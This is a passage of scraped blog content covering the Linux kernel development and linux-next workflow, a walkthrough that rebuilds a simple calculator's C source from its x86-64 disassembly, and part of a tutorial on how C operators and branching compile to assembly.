Testing and Bug Fixing: During the release candidate phase, extensive testing is performed by developers, testers, and the wider community. Any bugs, regressions, or issues discovered during this testing period are addressed and fixed in subsequent release candidates.\nStable Release: Once the release candidates have undergone sufficient testing and the kernel is deemed stable, the final stable release is made. The stable release incorporates all the accepted changes and bug fixes from the release candidates.\nLong-Term Support (LTS) Releases: In addition to the regular stable releases, certain versions of the Linux kernel are designated as Long-Term Support (LTS) releases. These LTS versions receive extended maintenance and bug fix support for a specified period to ensure stability and compatibility for enterprise and embedded systems.\nHere is how the 5.4 development cycle went:\nDate Release September 15, 2019 5.3 stable release September 30, 2019 5.4-rc1, merge window closes October 6, 2019 5.4-rc2 October 13, 2019 5.4-rc3 October 20, 2019 5.4-rc4 October 27, 2019 5.4-rc5 November 3, 2019 5.4-rc6 November 10, 2019 5.4-rc7 November 17, 2019 5.4-rc8 November 24, 2019 5.4 stable release Table taken from kernel.org/doc\nNext trees \u0026ldquo;Linux Next\u0026rdquo; refers to a specific development branch of the Linux kernel. The Linux Next branch serves as a staging area for upcoming changes and new features that are planned for inclusion in future versions of the Linux kernel. It acts as a testing ground where patches from different developers and subsystems are integrated and tested together.\nThe purpose of the Linux Next branch is to catch any potential conflicts or issues that may arise when combining different changes before they are merged into the mainline Linux kernel. 
By testing these changes in advance, it helps ensure the overall stability and quality of the Linux kernel.\nThe Linux Next branch is maintained by the Linux Next project, which is led by Stephen Rothwell and is supported by several Linux kernel developers. It provides a convenient way for developers to collaborate, test, and integrate their changes before they are submitted for inclusion in the mainline kernel.\nThere is a great YouTube video 1 where Greg Kroah-Hartman explains the whole development workflow. A MUST WATCH!!\nWorking with linux-next Now that we understand how the Linux development process works, we can see where the -next trees fall into the overall process. Let\u0026rsquo;s look at how these trees can be used to contribute to kernel development.\nInitial setup Clone the linux tree git clone https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git Add a linux-next remote. cd linux git remote add linux-next https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git Fetch the changes and tags from linux-next. git fetch linux-next git fetch --tags linux-next Regular tracking The linux-next tree is rebuilt every day\u0026hellip; so you need to update your copy every day before you start work, to make sure that you are not working on an older code base.\ngit checkout master git remote update Check newer tags git tag -l \u0026#34;next-*\u0026#34; | tail Check out a new branch from the tag you want to work on git checkout -b my_local_branch next-20230427 Now the next steps are very simple and straightforward.\nMake changes to the code base. Test it with the ./scripts/checkpatch.pl script for any issues which you need to solve before submitting it as a patch. Check git status and git diff before making a commit. Make a patch using the git format-patch command. Now you have a well tested and formatted patch, all you need to do is find the maintainers using the ./scripts/get_maintainer.pl script and then send the patch to all those people using git send-email. 
Note: All of the above-discussed tools and techniques are completely optional; this is just what I would do.\nResources Linux development subscription lists (mails) All linux trees (git) Linux-next man page Linux kernel development process (official doc) Youtube: Linux Kernel Development, Greg Kroah-Hartman - Git Merge 2016 https://www.youtube.com/watch?v=vyenmLqJQjs\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2023/05/eudyptula-task-7/","summary":"This is Task 07 of the Eudyptula Challenge ------------------------------------------ Great work with that misc device driver. Isn\u0026#39;t that a nice and simple way to write a character driver? Just when you think this challenge is all about writing kernel code, this task is a throwback to your second one. Yes, that\u0026#39;s right, building kernels. Turns out that\u0026#39;s what most developers end up doing, tons and tons of rebuilds, not writing new code.","title":"Eudyptula Task 7"},{"content":"We covered a wide range of topics in earlier articles that were helpful in comprehending how many lower-level processes operate. This blog will concentrate on applying those ideas to recreate C program after reverse engineering a simple calculator binary.\nIt is always a good idea to observe how the target software responds to various inputs. This gives you a sense of the internal logic that might be operating.\nIf we run this program without any arguments, we will get an error message stating that we need to pass more arguments as well as the usage guide is printed.\n❯ ./calc Not enough arguments passed Usage: ./calc \u0026lt;num1\u0026gt; \u0026lt;operator\u0026gt; \u0026lt;num2\u0026gt; So I can assume that there are checks in place which will see if we\u0026rsquo;ve passed enough arguments. 
If not, it\u0026rsquo;ll exit with the above message.\nSo its obvious for anybody now to try it with the arguments this time.\n❯ ./calc 5 + 3 5 + 3 = 8 ❯ ./calc 100 / 5 100 / 5 = 20 This works now and gives us the required output in a good looking way. That should do it for now.\nIt\u0026rsquo;s time to open up our hacker tools and disassemble the binary.\nDisassembly:-\naddFunc: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], edi mov DWORD PTR [rbp-8], esi mov edx, DWORD PTR [rbp-4] mov eax, DWORD PTR [rbp-8] add eax, edx pop rbp ret subFunc: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], edi mov DWORD PTR [rbp-8], esi mov eax, DWORD PTR [rbp-4] sub eax, DWORD PTR [rbp-8] pop rbp ret mulFunc: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], edi mov DWORD PTR [rbp-8], esi mov eax, DWORD PTR [rbp-4] imul eax, DWORD PTR [rbp-8] pop rbp ret divFunc: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], edi mov DWORD PTR [rbp-8], esi mov eax, DWORD PTR [rbp-4] cdq idiv DWORD PTR [rbp-8] pop rbp ret .LC0: .string \u0026#34;Not enough arguments passed\u0026#34; .LC1: .string \u0026#34;Usage: ./calc \u0026lt;num1\u0026gt; \u0026lt;operator\u0026gt; \u0026lt;num2\u0026gt;\u0026#34; die: push rbp mov rbp, rsp mov edi, OFFSET FLAT:.LC0 call puts mov edi, OFFSET FLAT:.LC1 call puts mov edi, 1 call exit .LC2: .string \u0026#34;%d %c %d = %d\\n\u0026#34; main: push rbp mov rbp, rsp sub rsp, 48 mov DWORD PTR [rbp-36], edi mov QWORD PTR [rbp-48], rsi cmp DWORD PTR [rbp-36], 3 jg .L11 mov eax, 0 call die .L11: mov rax, QWORD PTR [rbp-48] add rax, 8 mov rax, QWORD PTR [rax] mov rdi, rax call atoi mov DWORD PTR [rbp-12], eax mov rax, QWORD PTR [rbp-48] add rax, 24 mov rax, QWORD PTR [rax] mov rdi, rax call atoi mov DWORD PTR [rbp-16], eax mov rax, QWORD PTR [rbp-48] add rax, 16 mov rax, QWORD PTR [rax] movzx eax, BYTE PTR [rax] mov BYTE PTR [rbp-17], al movsx eax, BYTE PTR [rbp-17] cmp eax, 47 je .L12 cmp eax, 47 jg .L13 cmp eax, 45 je .L14 cmp eax, 45 jg .L13 cmp eax, 42 je .L15 cmp eax, 43 jne .L13 
mov QWORD PTR [rbp-8], OFFSET FLAT:addFunc jmp .L13 .L14: mov QWORD PTR [rbp-8], OFFSET FLAT:subFunc jmp .L13 .L15: mov QWORD PTR [rbp-8], OFFSET FLAT:mulFunc jmp .L13 .L12: mov QWORD PTR [rbp-8], OFFSET FLAT:divFunc nop .L13: mov edx, DWORD PTR [rbp-16] mov eax, DWORD PTR [rbp-12] mov rcx, QWORD PTR [rbp-8] mov esi, edx mov edi, eax call rcx mov esi, eax movsx edx, BYTE PTR [rbp-17] mov ecx, DWORD PTR [rbp-16] mov eax, DWORD PTR [rbp-12] mov r8d, esi mov esi, eax mov edi, OFFSET FLAT:.LC2 mov eax, 0 call printf nop leave ret This is far too large to handle at once. So I\u0026rsquo;ll start with smaller functions and see what they do before moving on to the main function.\n(In my opinion, there is no specific reverse engineering flow. You could start from anywhere that suits your needs and the project at hand.)\nNow the first function I\u0026rsquo;ll start with is going to be the addFunc.\naddFunc: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], edi mov DWORD PTR [rbp-8], esi mov edx, DWORD PTR [rbp-4] mov eax, DWORD PTR [rbp-8] add eax, edx pop rbp ret The first three lines are simply the function\u0026rsquo;s label and prologue.\nThen there are two mov statements (lines 4 and 5) that involve edi (first argument) and esi (second argument). They are the function arguments passed from the calling function to this function. These values are then saved in the [rbp-4] and [rbp-8] local variables.\nGiven the variable size (a DWORD, 4 bytes each), it is safe to assume that the passed variables are of the int type. That is, we are passing this function two int values.\nThen, at lines 6, 7, and 8, we simply load the values from the variables into edx and eax and then add them up. In this case, the result of the add instruction will be stored in the eax register. Remember, this is also the register where the return value of a function is stored. 
So when we return from this function, we have our addition result in the eax register.\nFinally, at lines 9 and 10, we make a graceful return from the function.\nThe next three functions, subFunc, mulFunc and divFunc, follow the same pattern.\nsubFunc: ; Prologue push rbp mov rbp, rsp ; Function arguments mov DWORD PTR [rbp-4], edi mov DWORD PTR [rbp-8], esi ; Load values and perform subtraction mov eax, DWORD PTR [rbp-4] sub eax, DWORD PTR [rbp-8] ; Return value is already in EAX, just return pop rbp ret mulFunc: ; Prologue push rbp mov rbp, rsp ; Function arguments mov DWORD PTR [rbp-4], edi mov DWORD PTR [rbp-8], esi ; Load values and perform multiplication mov eax, DWORD PTR [rbp-4] imul eax, DWORD PTR [rbp-8] ; Return value is already in EAX, just return pop rbp ret divFunc: ; Prologue push rbp mov rbp, rsp ; Function arguments mov DWORD PTR [rbp-4], edi mov DWORD PTR [rbp-8], esi ; Load values and perform division mov eax, DWORD PTR [rbp-4] cdq idiv DWORD PTR [rbp-8] ; Return value is already in EAX, just return pop rbp ret Now we are done with all the functions that perform the computations. Next comes the function which prints the help message and then exits.\n.LC0: .string \u0026#34;Not enough arguments passed\u0026#34; .LC1: .string \u0026#34;Usage: ./calc \u0026lt;num1\u0026gt; \u0026lt;operator\u0026gt; \u0026lt;num2\u0026gt;\u0026#34; die: push rbp mov rbp, rsp mov edi, OFFSET FLAT:.LC0 call puts mov edi, OFFSET FLAT:.LC1 call puts mov edi, 1 call exit The name implies that the purpose of this function is to terminate the execution of the calc program. Lines 8-9 show that this function is printing something using the puts function. The function\u0026rsquo;s argument is a string starting at offset .LC0 - \u0026quot;Not enough arguments passed\u0026quot;. 
Lines 10-11 contain another call to puts with an argument from offset .LC1 - \u0026quot;Usage: ./calc \u0026lt;num1\u0026gt; \u0026lt;operator\u0026gt; \u0026lt;num2\u0026gt;\u0026quot;.\nTogether, these two puts calls give the error message we got when we tried to execute the program without any arguments.\nFinally, it terminates with an exit function call (no return), and the function\u0026rsquo;s argument is the integer value 1. Typically, the exit status for successful execution is zero, and all non-zero values denote some type of execution error. So exiting with 1 indicates an error.\nNow we know what each function does at the atomic level. Let\u0026rsquo;s load our big guns and take a shot at the main() function.\n.LC2: .string \u0026#34;%d %c %d = %d\\n\u0026#34; main: push rbp mov rbp, rsp sub rsp, 48 mov DWORD PTR [rbp-36], edi mov QWORD PTR [rbp-48], rsi cmp DWORD PTR [rbp-36], 3 jg .L11 mov eax, 0 call die .L11: mov rax, QWORD PTR [rbp-48] add rax, 8 mov rax, QWORD PTR [rax] mov rdi, rax call atoi mov DWORD PTR [rbp-12], eax mov rax, QWORD PTR [rbp-48] add rax, 24 mov rax, QWORD PTR [rax] mov rdi, rax call atoi mov DWORD PTR [rbp-16], eax mov rax, QWORD PTR [rbp-48] add rax, 16 mov rax, QWORD PTR [rax] movzx eax, BYTE PTR [rax] mov BYTE PTR [rbp-17], al movsx eax, BYTE PTR [rbp-17] cmp eax, 47 je .L12 cmp eax, 47 jg .L13 cmp eax, 45 je .L14 cmp eax, 45 jg .L13 cmp eax, 42 je .L15 cmp eax, 43 jne .L13 mov QWORD PTR [rbp-8], OFFSET FLAT:addFunc jmp .L13 .L14: mov QWORD PTR [rbp-8], OFFSET FLAT:subFunc jmp .L13 .L15: mov QWORD PTR [rbp-8], OFFSET FLAT:mulFunc jmp .L13 .L12: mov QWORD PTR [rbp-8], OFFSET FLAT:divFunc nop .L13: mov edx, DWORD PTR [rbp-16] mov eax, DWORD PTR [rbp-12] mov rcx, QWORD PTR [rbp-8] mov esi, edx mov edi, eax call rcx mov esi, eax movsx edx, BYTE PTR [rbp-17] mov ecx, DWORD PTR [rbp-16] mov eax, DWORD PTR [rbp-12] mov r8d, esi mov esi, eax mov edi, OFFSET FLAT:.LC2 mov eax, 0 call printf nop leave ret The main function still appears to 
be too large to handle all at once, so I\u0026rsquo;ll cut it into smaller chunks to bite off and digest properly.\nThe prologue comes first\u0026hellip; setting up the function frame; nothing new here.\nmain: push rbp mov rbp, rsp Then we make some space in the frame to store the local variables.\nsub rsp, 48 We then store the edi and rsi values there, at [rbp-36] and [rbp-48]. If you remember, these two registers hold the first two arguments passed to a function. In this case, the arguments to the main function are argc and argv.\nargc \u0026ndash;\u0026gt; Count of the cli arguments passed to it. argv \u0026ndash;\u0026gt; Pointer to the list of arguments passed. Next up is the comparison\u0026hellip;which will check the count of args. This decides the branch the program execution takes - die or live.\ncmp DWORD PTR [rbp-36], 3 jg .L11 mov eax, 0 call die This compares [rbp-36] (argc) with the hardcoded value of 3. If argc is greater than 3, it\u0026rsquo;ll jump to .L11; otherwise (argc is 3 or less) it\u0026rsquo;ll call the die function\u0026hellip; which will print some messages and then exit with status 1. 
We already looked at that.\nSo if we write a C program for what we know about main till now, we\u0026rsquo;ll get something like:\nvoid main(int argc, char* argv[]) { if (argc \u0026lt; 4) { die(); } else { /* Keep on going to know more */ } } The next statements are something new, so you\u0026rsquo;ll have to believe me when I say that this is equivalent to argv[1].\n.L11: mov rax, QWORD PTR [rbp-48] add rax, 8 mov rax, QWORD PTR [rax] Before I start explaining, take a look at this diagram.\n[Diagram: rax is loaded from [rbp-48], which holds some_pointer_value (argv). That address is the start of a table of 8-byte pointers: ptr_to_prog_name at some_pointer_value, ptr_to_arg1 at some_pointer_value + 8, ptr_to_arg2 at some_pointer_value + 16, and ptr_to_arg3 at some_pointer_value + 24.]\nNow with this in your mind, we can start to understand the above 3 instructions.\nmov rax, QWORD PTR [rbp-48] This instruction loads some_pointer_value into the rax register.\nadd rax, 8 This adds 8 to the rax value. That means the resultant value is now some_pointer_value + 8. If you don\u0026rsquo;t know it already, 8 is the size of a pointer on x86_64 machines. 
So if we want to skip over 2 pointers, we\u0026rsquo;ll need something like some_pointer_value + 16.\nmov rax, QWORD PTR [rax] Now we load the value from that location. In C language, this would be equivalent to *(argv + 1) or argv[1] or if you are feeling funny 1[argv]. HOW?? 1\nNow, the next instruction calls the atoi function with argv[1] as its first argument.\nmov rdi, rax call atoi The atoi function converts a numeric string to the corresponding integer value. As an example, the string \u0026quot;12\u0026quot; will be converted to 12 (an int).\nmov DWORD PTR [rbp-12], eax And then whatever is returned by that function will be stored in the local variable at [rbp-12]. Remember, the eax register is used to pass the return value from the called function (atoi) back to the caller (main).\nThe next set of instructions is quite similar to what we just saw.\nmov rax, QWORD PTR [rbp-48] add rax, 24 mov rax, QWORD PTR [rax] mov rdi, rax call atoi mov DWORD PTR [rbp-16], eax If you notice, here we are adding 24 (8 * 3 = 24), which means the third argument is being used - argv[3]. Till this point we have successfully converted argv[1] and argv[3] to integers. These are the number1 and number2 values for our little calculator.\nNow argv[2]\u0026hellip; our operator character\u0026hellip; 1 byte value.\nmov rax, QWORD PTR [rbp-48] add rax, 16 mov rax, QWORD PTR [rax] movzx eax, BYTE PTR [rax] mov BYTE PTR [rbp-17], al This adds 16 - means argv[2]. So we load that pointer, read the first byte of the string it points to (movzx), and store the low byte al in the [rbp-17] location. In C, that is *argv[2], the first character of the operator argument.\nLet\u0026rsquo;s update our C program with the new findings.\nvoid main(int argc, char* argv[]) { if (argc \u0026lt; 4) { die(); } else { int num1 = atoi(argv[1]); int num2 = atoi(argv[3]); char op = *argv[2]; /* Keep on going to know more */ } } The next few lines of disassembly look like a conditional branch\u0026hellip;. 
So many \u0026ldquo;compare and jump\u0026rdquo; instructions.\nmovsx eax, BYTE PTR [rbp-17] cmp eax, 47 je .L12 cmp eax, 47 jg .L13 cmp eax, 45 je .L14 cmp eax, 45 jg .L13 cmp eax, 42 je .L15 cmp eax, 43 jne .L13 mov QWORD PTR [rbp-8], OFFSET FLAT:addFunc jmp .L13 .L14: mov QWORD PTR [rbp-8], OFFSET FLAT:subFunc jmp .L13 .L15: mov QWORD PTR [rbp-8], OFFSET FLAT:mulFunc jmp .L13 .L12: mov QWORD PTR [rbp-8], OFFSET FLAT:divFunc nop The value being compared is stored in [rbp-17] in this case. This contains the operator character from argv[2]. If you convert the numbers it is compared against to their char equivalents, you\u0026rsquo;ll get the following:\n47 is /, 45 is -, 42 is *, and 43 is +. With some calculations, you can conclude where the control will jump. To sum up,\nif the operator is 47 (/), then it\u0026rsquo;ll jump to .L12, which will move the offset location for divFunc function to a local variable.\nif the operator is 45 (-), then it\u0026rsquo;ll move offset location for subFunc function to that local variable.\nif the operator is 42 (*), then it\u0026rsquo;ll move offset location for mulFunc function to that local variable.\nif the operator is 43 (+), then it\u0026rsquo;ll move offset location for addFunc function to that local variable.\nFor any other input, it\u0026rsquo;ll simply move forward to .L13.\n.L13: mov edx, DWORD PTR [rbp-16] mov eax, DWORD PTR [rbp-12] mov rcx, QWORD PTR [rbp-8] mov esi, edx mov edi, eax call rcx mov esi, eax movsx edx, BYTE PTR [rbp-17] mov ecx, DWORD PTR [rbp-16] mov eax, DWORD PTR [rbp-12] mov r8d, esi mov esi, eax mov edi, OFFSET FLAT:.LC2 mov eax, 0 call printf nop leave ret Before reaching .L13, we have 4 variables in our program:-\nnumber1 - stored at [rbp-12] number2 - stored at [rbp-16] operator - stored at [rbp-17] pointer to the function which is selected on the basis of operator. This is stored at [rbp-8].
Now that we\u0026rsquo;re in .L13,\nWe assign the number1, number2, and the function pointer to eax, edx, and rcx, respectively. The function is then called with the arguments number1 and number2. Finally, the outcome is saved.\nThe remainder of the .L13 consists entirely of calling a printf function with a format string and other local variables. The final result will look like this: \u0026lt;number1\u0026gt; \u0026lt;operator\u0026gt; \u0026lt;number2\u0026gt; = \u0026lt;result_from_function\u0026gt;. I\u0026rsquo;ll leave it to you to dissect and solve the final puzzle piece. After printing, the function then exits gracefully.\nNow we can put everything together, and the complete code should look something like this.\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; // Function to perform addition int addFunc(int a, int b) { return a + b; } // Function to perform subtraction int subFunc(int a, int b) { return a - b; } // Function to perform multiplication int mulFunc(int a, int b) { return a * b; } // Function to perform division int divFunc(int a, int b) { return a / b; } // Function to print usage message and exit void die() { printf(\u0026#34;Not enough arguments passed\\n\u0026#34;); printf(\u0026#34;Usage: ./calc \u0026lt;num1\u0026gt; \u0026lt;operator\u0026gt; \u0026lt;num2\u0026gt;\\n\u0026#34;); exit(1); } // main function void main(int argc, char *argv[]) { if(argc \u0026lt; 4) die(); int x = atoi(argv[1]); int y = atoi(argv[3]); char option = *argv[2]; int (*fp) (int, int); switch(option) { case \u0026#39;+\u0026#39;: { fp = addFunc; break; } case \u0026#39;-\u0026#39;: { fp = subFunc; break; } case \u0026#39;*\u0026#39;: { fp = mulFunc; break; } case \u0026#39;/\u0026#39;: { fp = divFunc; break; } } printf(\u0026#34;%d %c %d = %d\\n\u0026#34;, x, option, y, fp(x,y)); } This may not be what the original developer wrote, but it will certainly behave the same. That is the entire point of reverse engineering. 
Dissecting something with your tools to understand how it behaves and then creating something that mimics the behavior.\nI encourage you to go and try to reverse engineer some more binaries. You can build your own if you want or just download some from online platforms like crackmes.one. Have fun!!\nhttps://stackoverflow.com/questions/381542/with-arrays-why-is-it-the-case-that-a5-5a\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2023/04/intro-to-re-simple-calculator/","summary":"We covered a wide range of topics in earlier articles that were helpful in comprehending how many lower-level processes operate. This blog will concentrate on applying those ideas to recreate C program after reverse engineering a simple calculator binary.\nIt is always a good idea to observe how the target software responds to various inputs. This gives you a sense of the internal logic that might be operating.\nIf we run this program without any arguments, we will get an error message stating that we need to pass more arguments as well as the usage guide is printed.","title":"Intro to RE: C : A Simple Calculator"},{"content":"In the previous blog, I discussed some of the basic C program\u0026rsquo;s disassembly structures, concentrating on the variables and their memory layouts. This article, a follow-up to the previous one, focuses on basic operations and functions in C programs.\nIn the previous blogs, we have seen what an empty C program looks like\nvoid main() {} Disassembly:\nmain: push rbp mov rbp, rsp nop pop rbp ret Arithmetic operators Now if we want to work with operations, we\u0026rsquo;ll have to add 2 local variables to the function.
Something like in the below example.\nvoid main() { int a=1, b=2; } Disassembly:\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 mov DWORD PTR [rbp-8], 2 nop pop rbp ret Addition Now let\u0026rsquo;s perform add operation on the 2 local variables we created and save the result in a new variable.\nvoid main() { int a=1, b=2; int c = a + b; } Disassembly:\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 mov DWORD PTR [rbp-8], 2 mov edx, DWORD PTR [rbp-4] mov eax, DWORD PTR [rbp-8] add eax, edx mov DWORD PTR [rbp-12], eax nop pop rbp ret We can see a few new instructions in the disassembly code that are responsible for the int c = a + b instruction in the source code.\nWhen we look at them separately, it becomes quite natural to understand.\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 mov DWORD PTR [rbp-8], 2 mov edx, DWORD PTR [rbp-4] ; Save the first variable value in EDX register mov eax, DWORD PTR [rbp-8] ; Save the second variable value in EAX register add eax, edx ; add EAX and EDX register values, this stores the result in EAX here mov DWORD PTR [rbp-12], eax ; Move the new value of EAX to third variable nop pop rbp ret Let\u0026rsquo;s look at other arithmetic operations as well\nSubtraction void main() { int a=1, b=2; int c = a - b; } Disassembly:\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 mov DWORD PTR [rbp-8], 2 mov eax, DWORD PTR [rbp-4] ; load first variable in EAX sub eax, DWORD PTR [rbp-8] ; subtract EAX with second variable, then save the result in EAX mov DWORD PTR [rbp-12], eax ; save the new value of EAX in the third register nop pop rbp ret Multiplication void main() { int a=1, b=2; int c = a * b; } Disassembly:\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 mov DWORD PTR [rbp-8], 2 mov eax, DWORD PTR [rbp-4] ; load first variable imul eax, DWORD PTR [rbp-8] ; multiply it with second mov DWORD PTR [rbp-12], eax ; save it in the third nop pop rbp ret Division and modulo If you are not aware, the division 
operation is about calculating the quotient and the modulo operation is about the remainder.\nvoid main() { int a = 1, b = 2; int c = a / b; int d = a % b; } Disassembly:\nmain: ; prologue push rbp mov rbp, rsp ; first and second variable mov DWORD PTR [rbp-4], 1 mov DWORD PTR [rbp-8], 2 ; division mov eax, DWORD PTR [rbp-4] ; Load first variable in EAX cdq ; Sign-extend EAX into EDX:EAX idiv DWORD PTR [rbp-8] ; perform idiv operation with second variable mov DWORD PTR [rbp-12], eax ; Store new EAX value in third variable ; modulo mov eax, DWORD PTR [rbp-4] ; Load the first value again cdq ; Sign-extend EAX into EDX:EAX idiv DWORD PTR [rbp-8] ; perform idiv operation with second variable mov DWORD PTR [rbp-16], edx ; Store the EDX value in fourth variable ; epilogue nop pop rbp ret If you didn\u0026rsquo;t notice, the division result was stored in the EAX register, while the modulo result was stored in the EDX\u0026hellip;Everything else stays unchanged.\nIt\u0026rsquo;s OKAY if you are having questions like-\nHow? why EDX?? WTF is going on??? Does it perform both operations even if only one of them is required???? These instructions are not as simple to understand as the others, so allow me to attempt to explain what\u0026rsquo;s going on.\nTo begin, you must comprehend the cdq instruction\u0026rsquo;s magic. This converts a Doubleword to a Quadword by copying the sign bit of EAX into every bit of the EDX register. For the purposes of this blog, consider the EAX and EDX to be joined together to form a large quadword register, with EDX as the upper half. So, if EDX contains 0x12 and EAX contains 0x3456789a, the resulting value is 0x123456789a. Does that make sense?\nSo when an idiv (or other div derivatives) operation is performed, both the quotient and the remainder are calculated.
The instruction stores the quotient in the EAX register and the remainder in the EDX register.\nNow that you understand the concept, you can think about removing some of the repeated instructions to make your program smaller and run faster.\nmain: ; prologue push rbp mov rbp, rsp ; first and second variable mov DWORD PTR [rbp-4], 1 mov DWORD PTR [rbp-8], 2 ; division and modulo mov eax, DWORD PTR [rbp-4] ; Load first variable in EAX cdq ; Sign-extend EAX into EDX:EAX idiv DWORD PTR [rbp-8] ; perform idiv operation with second variable mov DWORD PTR [rbp-12], eax ; Store new EAX value in third variable (quotient) mov DWORD PTR [rbp-16], edx ; Store the EDX value in fourth variable (remainder) ; epilogue nop pop rbp ret Another point worth mentioning is that div operations cannot be used without overwriting the contents of the EAX and EDX registers. If you need the values those registers held before the div operation, save them somewhere else first so they can be read later.\nIncrement/Decrement operators That\u0026rsquo;s all there is to arithmetic operators. Let\u0026rsquo;s move on to the increment and decrement operators\u0026hellip;\nvoid main() { int A = 5; int B = A++; int C = ++A; } Disassembly:-\nmain: ; prologue push rbp mov rbp, rsp ; int A = 5; mov DWORD PTR [rbp-4], 5 ; int B = A++; mov eax, DWORD PTR [rbp-4] ; load the value from variable A in EAX lea edx, [rax+1] ; increment the value and store it in EDX mov DWORD PTR [rbp-4], edx ; update the incremented value in the variable A mov DWORD PTR [rbp-8], eax ; Store the old EAX value in variable B ; int C = ++A; add DWORD PTR [rbp-4], 1 ; Increment the value of variable A mov eax, DWORD PTR [rbp-4] ; Load the updated value of variable A in EAX mov DWORD PTR [rbp-12], eax ; Store the EAX value in variable C ; epilogue nop pop rbp ret At this level, I believe you can see that this operator is nothing special. I\u0026rsquo;ll leave the decrement operator up to you to test and dissect.
You can always use godbolt.org 1 for quick testing.\nBitwise operators We can now proceed to examine the bitwise operators from a low-level perspective. (PS: They are my personal favourites)\nvoid main() { int A = 5, B = 0; int C1 = A \u0026amp; B; int C2 = A | B; int C3 = A ^ B; int C4 = ~ B; } Disassembly:-\nmain: ; prologue push rbp mov rbp, rsp ; int A = 5, B = 0; mov DWORD PTR [rbp-4], 5 mov DWORD PTR [rbp-8], 0 ; int C1 = A \u0026amp; B; mov eax, DWORD PTR [rbp-4] and eax, DWORD PTR [rbp-8] mov DWORD PTR [rbp-12], eax ; int C2 = A | B; mov eax, DWORD PTR [rbp-4] or eax, DWORD PTR [rbp-8] mov DWORD PTR [rbp-16], eax ; int C3 = A ^ B; mov eax, DWORD PTR [rbp-4] xor eax, DWORD PTR [rbp-8] mov DWORD PTR [rbp-20], eax ; int C4 = ~ B; mov eax, DWORD PTR [rbp-8] not eax mov DWORD PTR [rbp-24], eax ; epilogue nop pop rbp ret Simple and neat. Aren\u0026rsquo;t they? Load the variables in registers, perform the operation, store the result.\nshift right/left operators Then there are shift operators - shift left and shift right.\nvoid main() { int A = 1; int B = A \u0026lt;\u0026lt; 4; int C = B \u0026gt;\u0026gt; 4; } Disassembly:-\nmain: ; prologue push rbp mov rbp, rsp ; int A = 1; mov DWORD PTR [rbp-4], 1 ; int B = A \u0026lt;\u0026lt; 4; mov eax, DWORD PTR [rbp-4] sal eax, 4 ; Shift arithmetic left mov DWORD PTR [rbp-8], eax ; int C = B \u0026gt;\u0026gt; 4; mov eax, DWORD PTR [rbp-8] sar eax, 4 ; Shift arithmetic right mov DWORD PTR [rbp-12], eax ; epilogue nop pop rbp ret If you look at their binary representation, shift operators are very straightforward. Allow me to create an image for you.\nInitial value in memory\nIndex: 7 6 5 4 3 2 1 0\nValue: 0 0 0 0 0 0 0 1\nAfter shifting left 4 times.\nIndex: 7 6 5 4 3 2 1 0\nValue: 0 0 0 1 . . . .\nBlocks with \u0026ldquo;.\u0026rdquo; are the freshly shifted-in blocks from outside the memory frame. These blocks are filled with zeroes. This makes our resulting value 2^4 = 16.\nIndex: 7 6 5 4 3 2 1 0\nValue: 0 0 0 1 0 0 0 0\nIf we shift it right 4 times we\u0026rsquo;ll get our initial value.\nBefore:\nIndex: 7 6 5 4 3 2 1 0\nValue: 0 0 0 1 0 0 0 0\nAfter:\nIndex: 7 6 5 4 3 2 1 0\nValue: 0 0 0 0 0 0 0 1\nConsider this: if we shifted this value right once more, the only set bit would fall off the end, the entire frame would be filled with 0s, and the resultant value would be zero, no matter how many further shifts we make.\nAnother intriguing thing is that you can multiply a number by 2 using the shift left operation\u0026hellip;without actually using the * operation.\nvoid main() { int a = 589; int X = a*2; int Y = a \u0026lt;\u0026lt; 1; } main: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 589 ; int X = a*2; mov eax, DWORD PTR [rbp-4] add eax, eax mov DWORD PTR [rbp-8], eax ; int Y = a \u0026lt;\u0026lt; 1; mov eax, DWORD PTR [rbp-4] add eax, eax mov DWORD PTR [rbp-12], eax nop pop rbp ret At a lower level, they are identical. Nothing particularly useful, but it\u0026rsquo;s good to know what\u0026rsquo;s happening behind the scenes.\nBranching Now comes the branching. Every good program employs branching for one reason or another.
This is very useful to understand when considering reverse engineering.\nIf-else void main() { int a = 1; int x; if(a==2) x = 10; else x = 5; } Disassembly:\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 cmp DWORD PTR [rbp-4], 2 jne .L2 mov DWORD PTR [rbp-8], 10 jmp .L4 .L2: mov DWORD PTR [rbp-8], 5 .L4: nop pop rbp ret Let\u0026rsquo;s understand this step by step\nLine 1: label marking the start of the function\nLines 2-3: prologue; setting up the function frame\nLine 4: int a = 1;\nLine 5: compares this value with the hardcoded value 2\nLine 6: if the two values are not equal, jump to the .L2 label\nLine 7: x = 10; this runs only if it didn\u0026rsquo;t jump to .L2\nLine 8: jump to .L4\nLine 9: the .L2 label\nLine 10: x = 5;\nLines 11-14: the .L4 label and the epilogue for the function\nHere is a graph to make it simpler\n[Graph: the entry block (push rbp; mov rbp, rsp; mov DWORD PTR [rbp-4], 1; cmp DWORD PTR [rbp-4], 2; jne .L2) branches two ways. If the jump is not taken, mov DWORD PTR [rbp-8], 10 runs, followed by jmp .L4. If the jump is taken, mov DWORD PTR [rbp-8], 5 runs. Both paths meet at the final block: nop; pop rbp; ret.]\nSwitch-case Branching can also be implemented with switch-case statements in C and some other languages. At a lower level, they function similarly to if-else.\nvoid main() { int a = 1; int x; switch(a){ case 1: { x = 10; break; } case 2: { x = 20; break; } } } Disassembly:-\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 ; Compare and jump if equal cmp DWORD PTR [rbp-4], 1 je .L2 ; Compare and jump if equal 